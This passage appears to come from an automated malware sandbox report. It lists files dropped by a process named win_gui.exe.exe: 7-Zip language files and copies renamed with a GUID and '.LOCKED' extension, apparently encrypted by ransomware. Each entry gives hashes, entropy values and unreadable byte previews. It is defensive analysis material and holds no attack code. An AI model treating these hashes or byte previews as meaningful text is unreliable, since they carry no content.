                                Entropy (8bit):7.97072341972139
                                Encrypted:false
                                SSDEEP:192:MalrU+K/y6L281ATT8tiHaDgrgzC/+VOI:MalfK/yCYeirx+VOI
                                MD5:4763DF2DE3B37DC8D33A2B35A684D4BD
                                SHA1:29A5193A707944E6369ED13F4A5CB6BF5645316A
                                SHA-256:707DF8C0E55D9D7FB912B781F02DDE952CC458CDE95C152070CA55887A42099B
                                SHA-512:5F630499B6B93E2482637BE6068761659B06182CB98C0389B8EEEB0AA16C6CACF740A21AFBB725EC461615EA7166F91188CFFEC2F242A599C31D2ECB2A8D3DDF
                                Malicious:false
                                Preview:.....F....M........;.......D.>zN{.&..T..p4....?Z/...k..9...rN....Z..4.n.r.'...$.B......X.U.).......`s.64.........Fu.......Du....b...:faP...E.-...s.F..}}9..........S...U...]......JO-[..Bz91yy.".=..w... ..<..A_..A....J.kC|.....U+...z..|.*(..-.....p.?.....Hi=..2.l..%...=.N..[.._.uPM..;..W....`.....A.[.._..4W$.}..j].pJ~F;R.I*..n.....i..f.....Q.(.{....b...o.q..+..o..i.6.l...y<.{.>n.....mWM.I.[9..SL++.p.._...C....#e<..I...-....'/.l...K..{G.}..J.nE...$..#.h+M..e...U..~P./...{?.+z.....\%|.v.G:...../p.....5..%Yb._2.4.........BB.b.H.0(.Z.`.J()O...FJ..7..~.5........|.......|..=.26..B...8..........C.`.woc...4^.....^..0V.J...W7.......Q....9.6.....G......=(.uV.=W....BdI..t...6..Hpi..o.g.v.....H'^.-.n.....qU.I..5.....zK...>_....s`......i.u.@.".i..q.,.k.q...aYV...EK4/....M]:.YR1..{G..t...AB....=@. -.........5..,...K7......M..vV{U..Dh.W..x.d.....M..........<..yg=..B.k.3.|;V...B...........$.^.z.....4u.El...!.Y.....g.-....s..N3..^..O.....~.:e....kp....

                                C:\Program Files\7-Zip\Lang\sq.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6591
                                Entropy (8bit):7.97072341972139
                                Encrypted:false
                                SSDEEP:192:MalrU+K/y6L281ATT8tiHaDgrgzC/+VOI:MalfK/yCYeirx+VOI
                                MD5:4763DF2DE3B37DC8D33A2B35A684D4BD
                                SHA1:29A5193A707944E6369ED13F4A5CB6BF5645316A
                                SHA-256:707DF8C0E55D9D7FB912B781F02DDE952CC458CDE95C152070CA55887A42099B
                                SHA-512:5F630499B6B93E2482637BE6068761659B06182CB98C0389B8EEEB0AA16C6CACF740A21AFBB725EC461615EA7166F91188CFFEC2F242A599C31D2ECB2A8D3DDF
                                Malicious:false
                                Preview:.....F....M........;.......D.>zN{.&..T..p4....?Z/...k..9...rN....Z..4.n.r.'...$.B......X.U.).......`s.64.........Fu.......Du....b...:faP...E.-...s.F..}}9..........S...U...]......JO-[..Bz91yy.".=..w... ..<..A_..A....J.kC|.....U+...z..|.*(..-.....p.?.....Hi=..2.l..%...=.N..[.._.uPM..;..W....`.....A.[.._..4W$.}..j].pJ~F;R.I*..n.....i..f.....Q.(.{....b...o.q..+..o..i.6.l...y<.{.>n.....mWM.I.[9..SL++.p.._...C....#e<..I...-....'/.l...K..{G.}..J.nE...$..#.h+M..e...U..~P./...{?.+z.....\%|.v.G:...../p.....5..%Yb._2.4.........BB.b.H.0(.Z.`.J()O...FJ..7..~.5........|.......|..=.26..B...8..........C.`.woc...4^.....^..0V.J...W7.......Q....9.6.....G......=(.uV.=W....BdI..t...6..Hpi..o.g.v.....H'^.-.n.....qU.I..5.....zK...>_....s`......i.u.@.".i..q.,.k.q...aYV...EK4/....M]:.YR1..{G..t...AB....=@. -.........5..,...K7......M..vV{U..Dh.W..x.d.....M..........<..yg=..B.k.3.|;V...B...........$.^.z.....4u.El...!.Y.....g.-....s..N3..^..O.....~.:e....kp....

                                C:\Program Files\7-Zip\Lang\sr-spc.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12601
                                Entropy (8bit):7.984932607881382
                                Encrypted:false
                                SSDEEP:192:ShQdZCqBGpoEq6p+g7YzCTXV7p9aksM8XM4K8/2Hmek9+1xsUjK+VOd:S2d4No8p+zghp9aZj1K4YmekI5K+VOd
                                MD5:CE2F12FF1C924A6FD4E0FD4A65163B02
                                SHA1:D4D7B13401C6924F624D2906338AC42C1C8CABA3
                                SHA-256:3B78D7465DDA0F1398468334BFCC32BBEDE468675B5A57736F31CF980E8252B3
                                SHA-512:156020A4BE7B8EE9DF95FAEF410221A23D8033AE47C9385985A68088F382BF94AE837767DDA181D6E16C87EE215A18B57498E668A3103544060EB3E082D5E6B6
                                Malicious:false
                                Preview:.B.....k.H..jY.Ts.q$D.I.H.|..)..KU...'...*.-......pI...&..W.>7"....(f.....eR..n5.Y4l.....;...p.....%e..... .7..y.[+.K\.V.>D.D)...l..m |.}...=..7_l....L.(.@>s.....~....2......T........:mt9$.M....,.d..[.. ...Z..s..o.b.=O.n....Z.Q..Q.a.t..V...&$.c.n...H..cq6..r..w..7..B....s...a.OX`....... ...*..E..BU&[P.G.i..&...P.h!..<`..">..K.1...E.$D...X.0..0...Q1..cJE..G.+1A ..J.!C..../w...{...x..@..#JFn7t..."\'.r...E..N...j.C)..l.C,.......{./}t2.B....a6V4..ce..5...r.f...tiT~.....D.?2..B.q./. K5..`.g!....fka.%...5.K.j..R......V..;$..uB.IMx........I...c.\.x.%.#V:..:.5.5| .p...|.X.`......4.C....c..v],.(...n.b.2....%.....xr~p.... .#k{6.2.L.D.RW..!.A~.K.`...F....L.&.....R..}(..?..n......W..#...{%M..u....K>..B%....<YJ....{...qW..H....Hi.n..Pv.Hx..I..A...w..C.qg...:....b...5h..[........*U9&...F.R.1...xJx.^.OV..<.....y.e.o....M.6.....'.6.^D.;.9.u.H.:Z!...K.@...>..eya..u.....Y3...7....S...&.c...3.kbgG..A.-....I..05.S\..|N..[...\/.I.X!y.2.#;.C.G...E.uK=..5.t

                                C:\Program Files\7-Zip\Lang\sr-spc.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12601
                                Entropy (8bit):7.984932607881382
                                Encrypted:false
                                SSDEEP:192:ShQdZCqBGpoEq6p+g7YzCTXV7p9aksM8XM4K8/2Hmek9+1xsUjK+VOd:S2d4No8p+zghp9aZj1K4YmekI5K+VOd
                                MD5:CE2F12FF1C924A6FD4E0FD4A65163B02
                                SHA1:D4D7B13401C6924F624D2906338AC42C1C8CABA3
                                SHA-256:3B78D7465DDA0F1398468334BFCC32BBEDE468675B5A57736F31CF980E8252B3
                                SHA-512:156020A4BE7B8EE9DF95FAEF410221A23D8033AE47C9385985A68088F382BF94AE837767DDA181D6E16C87EE215A18B57498E668A3103544060EB3E082D5E6B6
                                Malicious:false
                                Preview:.B.....k.H..jY.Ts.q$D.I.H.|..)..KU...'...*.-......pI...&..W.>7"....(f.....eR..n5.Y4l.....;...p.....%e..... .7..y.[+.K\.V.>D.D)...l..m |.}...=..7_l....L.(.@>s.....~....2......T........:mt9$.M....,.d..[.. ...Z..s..o.b.=O.n....Z.Q..Q.a.t..V...&$.c.n...H..cq6..r..w..7..B....s...a.OX`....... ...*..E..BU&[P.G.i..&...P.h!..<`..">..K.1...E.$D...X.0..0...Q1..cJE..G.+1A ..J.!C..../w...{...x..@..#JFn7t..."\'.r...E..N...j.C)..l.C,.......{./}t2.B....a6V4..ce..5...r.f...tiT~.....D.?2..B.q./. K5..`.g!....fka.%...5.K.j..R......V..;$..uB.IMx........I...c.\.x.%.#V:..:.5.5| .p...|.X.`......4.C....c..v],.(...n.b.2....%.....xr~p.... .#k{6.2.L.D.RW..!.A~.K.`...F....L.&.....R..}(..?..n......W..#...{%M..u....K>..B%....<YJ....{...qW..H....Hi.n..Pv.Hx..I..A...w..C.qg...:....b...5h..[........*U9&...F.R.1...xJx.^.OV..<.....y.e.o....M.6.....'.6.^D.;.9.u.H.:Z!...K.@...>..eya..u.....Y3...7....S...&.c...3.kbgG..A.-....I..05.S\..|N..[...\/.I.X!y.2.#;.C.G...E.uK=..5.t

                                C:\Program Files\7-Zip\Lang\sr-spl.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7777
                                Entropy (8bit):7.976938975246717
                                Encrypted:false
                                SSDEEP:192:aJEefat9c5bzZNpa/PT1gu5JAp5Xdx3S6JLYEy2TI5eOfIC+VOm:aJpSbcrNpSTO2+9RS6JLfDTIhfR+VOm
                                MD5:15A2D572B2FD85FB99EBBC396518E27C
                                SHA1:A859316CFAFF6063C8F40710D6A5E60B8FADFB04
                                SHA-256:FF7DDEF15DD7B8FE1C2A8755F77243BF258459BB90D8597250AD9B0FD4D85113
                                SHA-512:B7D02C06D3785827B3BC9E0D42753516A23164F857120C4BFB0BA1FD5F91CE6DEF5CCD2654536536F1F90C0908413B2A7900B1B02238BBC921A40C22196FAFE3
                                Malicious:false
                                Preview:sL/..P..R..........k..z.Y...>.....h0:.c.,7.{.Y....f.....H.<.?.^.....M~..'.......p........./+$H...=.}.%.^.q.' &..+....=0...&.K..(..;E.jd3..+.~l.W..E!.7^V#....X..>*jAC.`...;..[!?.:'[K0....W..O...F.\......[.S.J...;....IL.>.....O..3...v\..D)A....b..?..x.....a.Gf...!..A..[..2.e.c......R.ul....."?...}.Q.=.K..N...&..'U..71...gz.........Tt`.{....G..I.T...w.*..!.S.W{%..Hr..*:.....J.u[4l..[4uM.....v.`.i......A/.9_.W8?p9..il.\>#...P3c]._.k&.#.-..._....v..G..`Z4...HC...:.....%..........i..]`.\7q.....tl.T.......`.>.S.N...U.z.U.8g~*.(NB.2.....2Z+...B...O.ei.-.byD...B...q.z.<.0...K.E*......z.=..7mz.)l.'..d........)..Dd.{y..u....@(..{..y........a.........8..lc...1 ......}.".weF.:.K.12>.\r....BV.b75*C.\.9. ?..KAw.V..\{.g!.D.m.~.nG...w.3a..e.Q...w...\,.i....l...H....K.{A$....../Y.>.X...?.MK.#....d.o..........1.q.!..9..C...(...a...&..........6.L.Mm#.0.....-....b..r.W.'U..#...p..B2..".%^f.....E.~.yz.-Fi2...+..^....%...}...l.t..jMT..m;...2*....X.Q.'.1}.}L1.."Jf

                                C:\Program Files\7-Zip\Lang\sr-spl.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7777
                                Entropy (8bit):7.976938975246717
                                Encrypted:false
                                SSDEEP:192:aJEefat9c5bzZNpa/PT1gu5JAp5Xdx3S6JLYEy2TI5eOfIC+VOm:aJpSbcrNpSTO2+9RS6JLfDTIhfR+VOm
                                MD5:15A2D572B2FD85FB99EBBC396518E27C
                                SHA1:A859316CFAFF6063C8F40710D6A5E60B8FADFB04
                                SHA-256:FF7DDEF15DD7B8FE1C2A8755F77243BF258459BB90D8597250AD9B0FD4D85113
                                SHA-512:B7D02C06D3785827B3BC9E0D42753516A23164F857120C4BFB0BA1FD5F91CE6DEF5CCD2654536536F1F90C0908413B2A7900B1B02238BBC921A40C22196FAFE3
                                Malicious:false
                                Preview:sL/..P..R..........k..z.Y...>.....h0:.c.,7.{.Y....f.....H.<.?.^.....M~..'.......p........./+$H...=.}.%.^.q.' &..+....=0...&.K..(..;E.jd3..+.~l.W..E!.7^V#....X..>*jAC.`...;..[!?.:'[K0....W..O...F.\......[.S.J...;....IL.>.....O..3...v\..D)A....b..?..x.....a.Gf...!..A..[..2.e.c......R.ul....."?...}.Q.=.K..N...&..'U..71...gz.........Tt`.{....G..I.T...w.*..!.S.W{%..Hr..*:.....J.u[4l..[4uM.....v.`.i......A/.9_.W8?p9..il.\>#...P3c]._.k&.#.-..._....v..G..`Z4...HC...:.....%..........i..]`.\7q.....tl.T.......`.>.S.N...U.z.U.8g~*.(NB.2.....2Z+...B...O.ei.-.byD...B...q.z.<.0...K.E*......z.=..7mz.)l.'..d........)..Dd.{y..u....@(..{..y........a.........8..lc...1 ......}.".weF.:.K.12>.\r....BV.b75*C.\.9. ?..KAw.V..\{.g!.D.m.~.nG...w.3a..e.Q...w...\,.i....l...H....K.{A$....../Y.>.X...?.MK.#....d.o..........1.q.!..9..C...(...a...&..........6.L.Mm#.0.....-....b..r.W.'U..#...p..B2..".%^f.....E.~.yz.-Fi2...+..^....%...}...l.t..jMT..m;...2*....X.Q.'.1}.}L1.."Jf

                                C:\Program Files\7-Zip\Lang\sv.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9833
                                Entropy (8bit):7.9801392373719295
                                Encrypted:false
                                SSDEEP:192:G5jS0BemTyUa7z9smSRm5bD7tVVpmMiMIB4JKu+VOV:rKazsmSR6DJvpmM9Icp+VOV
                                MD5:14FF1DB465F42C6484D59170B73FBF4C
                                SHA1:04ACFDAED15BA3986428EDC3D1E651977D4C2018
                                SHA-256:47FC6FE071EA856469ACDB1919A1C171F3B9967C19D4E75EAB9EDCFA6E059EE7
                                SHA-512:156029C1F7CDCD0DA66991657819F06EC52EC5C8778F6E1AE3249652EAB494E5A05CA59F1901BFE83D067EBCE0908AA0007BE5E99C38DE92851FB48DE730B530
                                Malicious:false
                                Preview:S......0.8.,.A.i..#..n0s...|@...3..Q1..W....o6.$....w..~...,....U.1V......h.|....*...(.(Y...hZ...N..D@...S;t.....|.(...j....GV.....u..R.|&1.b 5..2.....z*I*!..o.L.B.6..>...9 ....Q..S..."..0.j....M...af)^....M.K...S..P|....'..SN.......B..V?..z>.!.u.....Qts..N.T..{........O4.`7A.B.L>k.To...;....:.ed!....s._'[..............v.....h...d....@...|.n.........j.1....Y/........G...`..&.".....-..x2R.Z...^K.....]..X..6~....P..../m....P..(...C...4..G.yT.......H.^..L...H..$.8.....+..ld&...*\04......z..q...=.....m.y.^n..d.........."..;..K.of.V....".5.....xb....w`...J..u4....D=..Pp.....7f.....%.)..(W..Ci.N.... x......(!?....b>>._:\i(....f..V....up7`.........!Z9..5..$..{k....j_.w.".Y.2H..lU....zR..s...| =.p...~.o....F..5bjc.yD<.CG]..+.EC....v........Sa...~V.I....x.....?..,...jo.."...6.F.!.......~:...bl..h...N+.5.J5,..*|.E....C..`.....j.Rj..eWD6........+L.c.W^.D..c..r...M..,..V'.vA......^D..0._:.-....4..R.^}.NF...ZQM#i.]...@S..s.4.....{X'D...6.,.Uq....9..pQ

                                C:\Program Files\7-Zip\Lang\sv.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9833
                                Entropy (8bit):7.9801392373719295
                                Encrypted:false
                                SSDEEP:192:G5jS0BemTyUa7z9smSRm5bD7tVVpmMiMIB4JKu+VOV:rKazsmSR6DJvpmM9Icp+VOV
                                MD5:14FF1DB465F42C6484D59170B73FBF4C
                                SHA1:04ACFDAED15BA3986428EDC3D1E651977D4C2018
                                SHA-256:47FC6FE071EA856469ACDB1919A1C171F3B9967C19D4E75EAB9EDCFA6E059EE7
                                SHA-512:156029C1F7CDCD0DA66991657819F06EC52EC5C8778F6E1AE3249652EAB494E5A05CA59F1901BFE83D067EBCE0908AA0007BE5E99C38DE92851FB48DE730B530
                                Malicious:false
                                Preview:S......0.8.,.A.i..#..n0s...|@...3..Q1..W....o6.$....w..~...,....U.1V......h.|....*...(.(Y...hZ...N..D@...S;t.....|.(...j....GV.....u..R.|&1.b 5..2.....z*I*!..o.L.B.6..>...9 ....Q..S..."..0.j....M...af)^....M.K...S..P|....'..SN.......B..V?..z>.!.u.....Qts..N.T..{........O4.`7A.B.L>k.To...;....:.ed!....s._'[..............v.....h...d....@...|.n.........j.1....Y/........G...`..&.".....-..x2R.Z...^K.....]..X..6~....P..../m....P..(...C...4..G.yT.......H.^..L...H..$.8.....+..ld&...*\04......z..q...=.....m.y.^n..d.........."..;..K.of.V....".5.....xb....w`...J..u4....D=..Pp.....7f.....%.)..(W..Ci.N.... x......(!?....b>>._:\i(....f..V....up7`.........!Z9..5..$..{k....j_.w.".Y.2H..lU....zR..s...| =.p...~.o....F..5bjc.yD<.CG]..+.EC....v........Sa...~V.I....x.....?..,...jo.."...6.F.!.......~:...bl..h...N+.5.J5,..*|.E....C..`.....j.Rj..eWD6........+L.c.W^.D..c..r...M..,..V'.vA......^D..0._:.-....4..R.^}.NF...ZQM#i.]...@S..s.4.....{X'D...6.,.Uq....9..pQ

                                C:\Program Files\7-Zip\Lang\sw.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9142
                                Entropy (8bit):7.9789833760269175
                                Encrypted:false
                                SSDEEP:192:AQcFIZKlqzmU9zVcFPcNyEwdI8G7ytfuN3XmPhMRGE+VOh6:AQcuZmlKmPZECIw5uN3kE+VOs
                                MD5:FAAF26C91BBE9AF2E7DC79F0FC7D9B5C
                                SHA1:2CDCA2399FD1D1ABFE48EC0768C719A9113F3090
                                SHA-256:C79D1628DCF773A26151359FD6462CCABBFC32F6390CC56489DCA131C8BF21C3
                                SHA-512:CE48FC644511BD729BF6742A00A29EF585B087F36A1DD1BB25D02A674AFD38F495E61315C85441A08294D8BF9664EB2C87F7D590146AF05CCD4F89826D5BB703
                                Malicious:false
                                Preview:L..6....g..Y...;.]g.....y.&.BU.lUL^V.....,w..F0...y..FDN.K.K.N.....:Y<.."..={..NM..:...I...7..T+h.K3....#..j..;".R..*..Bw.k....ng..:.$......f..5^.a.T.2e...g [.....W{;..?.v....d&H.K...UA.q.}(cB......t.....IG.Q...Z./.....i.............P.x.*..]......d..<..._-t.c].Y.i.>....}.K............6..}....}.l.pP..]\.w{WS}R.p{Wp..>V..^.L..{n...n2.....k..,$..5.]F...A0}p...LL(.P.Rr.t..OhG.1&.9.s.U.1"..H..jF..s.s....X.W..0..6..o..,dW..%..&4....&.....h 4(...f..:....7..YN....[..U....@......w.*.%....F..T.b5G.........S.0.%..N.#GW.Y...2.......)\.....7T.~5ST...P......9..FV.}.:... MCWp.C..[...^JuR.m.&.....j....I.C...H/..=h>......w.j|#....o6.-E..tc.s..A..u.'.y!...9...i;.`...R|@..aA..<.Y...@.....EqX..>.@.......*.pE..L.lE.....$][+...N'.*...d.......eS.....8.J..R..@...vG.......O.iI:.n.`4..]s<......r.B3z.C. ..f.>.).... /...}..A...*....y9.8.....gv<1RmX,XL8%...'......._.1.].N.sU.....8:.'..{....G..o..%......<gr.,..vs:xk.1P..).....S.....t.-....".....'...f3........O.|S.%}

                                C:\Program Files\7-Zip\Lang\sw.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9142
                                Entropy (8bit):7.9789833760269175
                                Encrypted:false
                                SSDEEP:192:AQcFIZKlqzmU9zVcFPcNyEwdI8G7ytfuN3XmPhMRGE+VOh6:AQcuZmlKmPZECIw5uN3kE+VOs
                                MD5:FAAF26C91BBE9AF2E7DC79F0FC7D9B5C
                                SHA1:2CDCA2399FD1D1ABFE48EC0768C719A9113F3090
                                SHA-256:C79D1628DCF773A26151359FD6462CCABBFC32F6390CC56489DCA131C8BF21C3
                                SHA-512:CE48FC644511BD729BF6742A00A29EF585B087F36A1DD1BB25D02A674AFD38F495E61315C85441A08294D8BF9664EB2C87F7D590146AF05CCD4F89826D5BB703
                                Malicious:false
                                Preview:L..6....g..Y...;.]g.....y.&.BU.lUL^V.....,w..F0...y..FDN.K.K.N.....:Y<.."..={..NM..:...I...7..T+h.K3....#..j..;".R..*..Bw.k....ng..:.$......f..5^.a.T.2e...g [.....W{;..?.v....d&H.K...UA.q.}(cB......t.....IG.Q...Z./.....i.............P.x.*..]......d..<..._-t.c].Y.i.>....}.K............6..}....}.l.pP..]\.w{WS}R.p{Wp..>V..^.L..{n...n2.....k..,$..5.]F...A0}p...LL(.P.Rr.t..OhG.1&.9.s.U.1"..H..jF..s.s....X.W..0..6..o..,dW..%..&4....&.....h 4(...f..:....7..YN....[..U....@......w.*.%....F..T.b5G.........S.0.%..N.#GW.Y...2.......)\.....7T.~5ST...P......9..FV.}.:... MCWp.C..[...^JuR.m.&.....j....I.C...H/..=h>......w.j|#....o6.-E..tc.s..A..u.'.y!...9...i;.`...R|@..aA..<.Y...@.....EqX..>.@.......*.pE..L.lE.....$][+...N'.*...d.......eS.....8.J..R..@...vG.......O.iI:.n.`4..]s<......r.B3z.C. ..f.>.).... /...}..A...*....y9.8.....gv<1RmX,XL8%...'......._.1.].N.sU.....8:.'..{....G..o..%......<gr.,..vs:xk.1P..).....S.....t.-....".....'...f3........O.|S.%}

                                C:\Program Files\7-Zip\Lang\ta.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13069
                                Entropy (8bit):7.986898334693524
                                Encrypted:false
                                SSDEEP:384:2Lx4AFPD9EGUxFBCN/aLCzkVoffNlLFu/0Ays+VOB:04Av+3CNiLCztpFUfyst
                                MD5:3DE557DA6B4E7C3C4B7B30E8EF237215
                                SHA1:93CCDF26325936BC6224E0C2BBE366F0BA341B93
                                SHA-256:97DB990CC6C9F0AFBAE4DDABB5B65A278ECCFEDA18A5D0D94AC02E21FD39ED62
                                SHA-512:B08A5234D456BC0764E40A91C24580377E5CFEFEFF7EF36F30A6734B10198387D4C2271955A0E9A9C12EEE8D65035A3A6AA10634EF00E9BDC6BA210A390681E9
                                Malicious:false
                                Preview:M...%..-b'...L..{........\....d..L...../..8.t...W..V............!8..u..!........V.`..K.7....&{..2.Q...qXW....?A.b.$......|.'....U.U.K.<...Q.~...cz.....$,.o6.@.&M..6..w.K.y....I.<....4........t.....ri.9=..|.2=......9J........u...T...<....a..k^.U.......P.4..r.....F+c.i.4w....w.#y....yWBj....c|.J.K.!....1\....<D....:.....'.OS.&..Z..Z..p..x.L\.$.,R..%Bdp..<Xr.d..z..LP.a....;Q.,.8$..w.\h..Ur.I!.]...}.kSQ/.FWE.O.6m."..kD. .........W=.mh....&x......d;.>.J.|(.*t....%.. {....d.*.......[.....E......x..3..,.~.........x7....E.b=."(.....q...z.......&3......W..GO.z.&l.3..b*.X.........0..9z..3.^;g....2..DA.....U.].Sx....ms..<.j5..P.......\N!..A<L.v..8....Hb....n...`FW_....C..U.h..4+.{..qq...Dxc.:.*p<....^"....4 `.u...A..@...6.:t.f.h.uq,f'.'......0r<...R.?.....6.......u....+..7.'...^.x....h.L7O.iqzvJ.....fP...F..[,.8...P......RG.b........$gMHJ....m:........P.7...x3......^...f....*.f@@.7_...gqg"i..e..e..K..XV.TuM.D.T0D..1t...v.'.'....fA.

                                C:\Program Files\7-Zip\Lang\ta.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13069
                                Entropy (8bit):7.986898334693524
                                Encrypted:false
                                SSDEEP:384:2Lx4AFPD9EGUxFBCN/aLCzkVoffNlLFu/0Ays+VOB:04Av+3CNiLCztpFUfyst
                                MD5:3DE557DA6B4E7C3C4B7B30E8EF237215
                                SHA1:93CCDF26325936BC6224E0C2BBE366F0BA341B93
                                SHA-256:97DB990CC6C9F0AFBAE4DDABB5B65A278ECCFEDA18A5D0D94AC02E21FD39ED62
                                SHA-512:B08A5234D456BC0764E40A91C24580377E5CFEFEFF7EF36F30A6734B10198387D4C2271955A0E9A9C12EEE8D65035A3A6AA10634EF00E9BDC6BA210A390681E9
                                Malicious:false
                                Preview:M...%..-b'...L..{........\....d..L...../..8.t...W..V............!8..u..!........V.`..K.7....&{..2.Q...qXW....?A.b.$......|.'....U.U.K.<...Q.~...cz.....$,.o6.@.&M..6..w.K.y....I.<....4........t.....ri.9=..|.2=......9J........u...T...<....a..k^.U.......P.4..r.....F+c.i.4w....w.#y....yWBj....c|.J.K.!....1\....<D....:.....'.OS.&..Z..Z..p..x.L\.$.,R..%Bdp..<Xr.d..z..LP.a....;Q.,.8$..w.\h..Ur.I!.]...}.kSQ/.FWE.O.6m."..kD. .........W=.mh....&x......d;.>.J.|(.*t....%.. {....d.*.......[.....E......x..3..,.~.........x7....E.b=."(.....q...z.......&3......W..GO.z.&l.3..b*.X.........0..9z..3.^;g....2..DA.....U.].Sx....ms..<.j5..P.......\N!..A<L.v..8....Hb....n...`FW_....C..U.h..4+.{..qq...Dxc.:.*p<....^"....4 `.u...A..@...6.:t.f.h.uq,f'.'......0r<...R.?.....6.......u....+..7.'...^.x....h.L7O.iqzvJ.....fP...F..[,.8...P......RG.b........$gMHJ....m:........P.7...x3......^...f....*.f@@.7_...gqg"i..e..e..K..XV.TuM.D.T0D..1t...v.'.'....fA.

                                C:\Program Files\7-Zip\Lang\tg.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15735
                                Entropy (8bit):7.987095028651559
                                Encrypted:false
                                SSDEEP:384:2LhO4zpx4VA1UMcTn+A8IoOqZ3bJSTUNSVRCX+VOy:04GpyVA1xcTnGb3ZUTUIOe
                                MD5:A20C4C2119A03A5724EBC037BA844AC5
                                SHA1:FA79950FF21975CEB6E9437F19C304242AF88861
                                SHA-256:BCE8BCA6461B7E2CA3673E11FF6F4012BB7B56C2CCB8370A3AEDA08B27F3209D
                                SHA-512:5C21667C8CE36111869AC398BD6E645523D070BAD2397BC4428985F38E294814E312E575ADE1483FA23E5CB6E6A9CF6C7FCCF5B07FFDB13D7CAAC87D00C9A7F4
                                Malicious:false
                                Preview:]...6.X.....P.P..P.KU..gQ..u P...1:.~..*,..GK.....8.i.]...z%.)....E{D.R#..#.....y%..]W...r..e......rII.....FXPyh......P..s...+..{7<-...!.......!.j)..{.....l.!.).I.....!.@... Q.7..p....E^.2.?...J..,-.....f...$.h..!.YxyQ.....(..>.:I.&.........Hi]3^.=......J+2%cd5.`..#.G.<%....G1.@..;q..^(..B...S@G..dc.....[.s..C..5?...^..}.y.*^>^f...g.....E....t@l*X4..s..9-*s0}.>..Evxy`..D..h..N"....[.$......>J.uO...V...._.x.....07 .$...A....G}i...y{..Q.@zU..H.......a..rv. 6,.......EV..Z.....ce1j....".~O.Z.H...............N{..v..hK..2.fr.[...z.5)..8..........-...`..w......BD[@.-..)Gk.V.H...Bb..=..O....R./.i,..z..*.V..U.....a.#[v.v....v;.\.S.t.;Ji`.q._.9...9.{.Mx.....I.u...#..i.]V....*..:.yN.jm6.G'6/.x.C.S....).........I..H....{" .=....]K..Q....RLY...du=-&,.....S.6G.x...\,*Z..L.IK.2d..W0%.p..+b...'..[W......X'.../<........i%h1....}qc.T.N...a....o.......PP>...#.v....h...........UnZsD".wR.0.}[(. 3._...e(.........h..~..J.;Id.`....D.~...3..Q...-g.e1.o.MI..>..'~[

                                C:\Program Files\7-Zip\Lang\tg.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15735
                                Entropy (8bit):7.987095028651559
                                Encrypted:false
                                SSDEEP:384:2LhO4zpx4VA1UMcTn+A8IoOqZ3bJSTUNSVRCX+VOy:04GpyVA1xcTnGb3ZUTUIOe
                                MD5:A20C4C2119A03A5724EBC037BA844AC5
                                SHA1:FA79950FF21975CEB6E9437F19C304242AF88861
                                SHA-256:BCE8BCA6461B7E2CA3673E11FF6F4012BB7B56C2CCB8370A3AEDA08B27F3209D
                                SHA-512:5C21667C8CE36111869AC398BD6E645523D070BAD2397BC4428985F38E294814E312E575ADE1483FA23E5CB6E6A9CF6C7FCCF5B07FFDB13D7CAAC87D00C9A7F4
                                Malicious:false
                                Preview:]...6.X.....P.P..P.KU..gQ..u P...1:.~..*,..GK.....8.i.]...z%.)....E{D.R#..#.....y%..]W...r..e......rII.....FXPyh......P..s...+..{7<-...!.......!.j)..{.....l.!.).I.....!.@... Q.7..p....E^.2.?...J..,-.....f...$.h..!.YxyQ.....(..>.:I.&.........Hi]3^.=......J+2%cd5.`..#.G.<%....G1.@..;q..^(..B...S@G..dc.....[.s..C..5?...^..}.y.*^>^f...g.....E....t@l*X4..s..9-*s0}.>..Evxy`..D..h..N"....[.$......>J.uO...V...._.x.....07 .$...A....G}i...y{..Q.@zU..H.......a..rv. 6,.......EV..Z.....ce1j....".~O.Z.H...............N{..v..hK..2.fr.[...z.5)..8..........-...`..w......BD[@.-..)Gk.V.H...Bb..=..O....R./.i,..z..*.V..U.....a.#[v.v....v;.\.S.t.;Ji`.q._.9...9.{.Mx.....I.u...#..i.]V....*..:.yN.jm6.G'6/.x.C.S....).........I..H....{" .=....]K..Q....RLY...du=-&,.....S.6G.x...\,*Z..L.IK.2d..W0%.p..+b...'..[W......X'.../<........i%h1....}qc.T.N...a....o.......PP>...#.v....h...........UnZsD".wR.0.}[(. 3._...e(.........h..~..J.;Id.`....D.~...3..Q...-g.e1.o.MI..>..'~[

                                C:\Program Files\7-Zip\Lang\th.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16462
                                Entropy (8bit):7.988783538609353
                                Encrypted:false
